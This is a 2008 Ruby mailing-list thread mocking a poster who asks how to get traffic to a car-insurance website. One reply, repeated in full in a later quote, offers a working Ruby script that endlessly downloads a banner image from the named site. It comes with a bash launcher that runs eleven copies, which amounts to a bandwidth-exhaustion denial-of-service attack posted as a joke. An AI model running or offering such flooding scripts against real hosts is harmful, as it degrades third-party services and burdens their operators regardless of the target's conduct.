How to promote my site?

I have a site on insurance: http://www.carsinsuranceguide.com
However, no traffic, Does anyone can tell me how to get traffic?

···

--
Posted via http://www.ruby-forum.com/.

Travis Kevindy0223 wrote:

I have a site on insurance: http://www.carsinsuranceguide.com
However, no traffic, Does anyone can tell me how to get traffic?

Not by posting here, you won't.

- --
Phillip Gawlowski
Twitter: twitter.com/cynicalryan

:zombie: [UNIX] n. A process that has died but has not yet
~ relinquished its process table slot (because the parent process
~ hasn't executed a `wait(2)' for it yet). These can be seen in
~ `ps(1)' listings occasionally. Compare {orphan}.
~ -- The AI Hackers Dictionary

Travis Kevindy0223 wrote:

I have a site on insurance: http://www.carsinsuranceguide.com
However, no traffic, Does anyone can tell me how to get traffic?

My car insurance goes up if I spend too much time in traffic.

Travis Kevindy0223 wrote:

I have a site on insurance: http://www.example.com
However, no traffic, Does anyone can tell me how to get traffic?

Why don't you try posting to every newsgroup in the worl... oh.

···

--
       vjoel : Joel VanderWerf : path berkeley edu : 510 665 3407

Kevindy0223,

Is that response consistent with Ruby Way? He asked nicely.
I for one intend to drive a lot of traffic to his site:

# ------------ bandwidtheater.rb --------------

#!/usr/bin/ruby
require 'net/http'

url = URI.parse('http://www.carsinsuranceguide.com/images/banners/shop-ad-books.jpg'\)
req = Net::HTTP::Get.new(url.path)
while(true)
  res = Net::HTTP.start(url.host, url.port) {|http|
    http.request(req)
    print "."
    $stdout.flush
  }
end

# ------------ eaterspawn.sh --------------

#!/bin/bash
for ((i=0;i<=10;i+=1)); do
   bandwidtheater.rb &
done

# ------- stopping ---------------

kill -9 `ps -e | grep bandwidtheater | awk '{print $1}' | xargs `

···

-----Original Message-----
From: Phillip Gawlowski [mailto:cmdjackryan@googlemail.com]
Sent: Mon 4/28/2008 10:02 PM
To: ruby-talk ML
Subject: Re: How to promote my site?

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Travis Kevindy0223 wrote:

I have a site on insurance: http://www.carsinsuranceguide.com
However, no traffic, Does anyone can tell me how to get traffic?

Not by posting here, you won't.

- --
Phillip Gawlowski
Twitter: twitter.com/cynicalryan

:zombie: [UNIX] n. A process that has died but has not yet
~ relinquished its process table slot (because the parent process
~ hasn't executed a `wait(2)' for it yet). These can be seen in
~ `ps(1)' listings occasionally. Compare {orphan}.
~ -- The AI Hackers Dictionary

Sorry, I meant to address this to Phillip Gawlowski (rather than the spammer)

···

-----Original Message-----
From: Kevin Brown [mailto:Kevin.Brown@air2web.com]
Sent: Tue 4/29/2008 3:48 PM
To: ruby-talk ML
Subject: Re: How to promote my site?

Kevindy0223,

Is that response consistent with Ruby Way? He asked nicely.
I for one intend to drive a lot of traffic to his site:

Kevin Brown wrote:

Is that response consistent with Ruby Way? He asked nicely.
I for one intend to drive a lot of traffic to his site:

Short, concise, to the point with a hint of syntactic sugar. :stuck_out_tongue:

Also, I left him/her alive, didn't I? :wink:

- --
Phillip Gawlowski
Twitter: twitter.com/cynicalryan
Blog: http://justarubyist.blogspot.com

~ "I suppose if we couldn't laugh at things that don't make sense, we
couldn't react to a lot of life." -Hobbes

Kevin Brown wrote:

Kevindy0223,

Is that response consistent with Ruby Way? He asked nicely. I for one intend to drive a lot of traffic to his site:

# ------------ bandwidtheater.rb --------------

#!/usr/bin/ruby
require 'net/http'

url = URI.parse('http://www.carsinsuranceguide.com/images/banners/shop-ad-books.jpg&#39;\)
req = Net::HTTP::Get.new(url.path)
while(true)
  res = Net::HTTP.start(url.host, url.port) {|http|
    http.request(req)
    print "."
    $stdout.flush
  }
end

# ------------ eaterspawn.sh --------------

#!/bin/bash
for ((i=0;i<=10;i+=1)); do
   bandwidtheater.rb &
done

# ------- stopping ---------------

kill -9 `ps -e | grep bandwidtheater | awk '{print $1}' | xargs `

From: Phillip Gawlowski [mailto:cmdjackryan@googlemail.com]
Sent: Mon 4/28/2008 10:02 PM
To: ruby-talk ML
Subject: Re: How to promote my site?
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Travis Kevindy0223 wrote:
> I have a site on insurance: http://www.carsinsuranceguide.com
> However, no traffic, Does anyone can tell me how to get traffic?

Not by posting here, you won't.

- --
Phillip Gawlowski
Twitter: twitter.com/cynicalryan

:zombie: [UNIX] n. A process that has died but has not yet
~ relinquished its process table slot (because the parent process
~ hasn't executed a `wait(2)' for it yet). These can be seen in
~ `ps(1)' listings occasionally. Compare {orphan}.
~ -- The AI Hackers Dictionary
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkgWgbIACgkQbtAgaoJTgL+p0gCfX/KJBRhbRHUUmsZYTBI0WXls
qpcAoJRZhqjnpGg4kTmefCehFuvhmBg6
=7/bG
-----END PGP SIGNATURE-----

A word of caution -- if you use scripts to artificially inflate your traffic, bad things can happen to you, like getting put on blacklists.

···

-----Original Message-----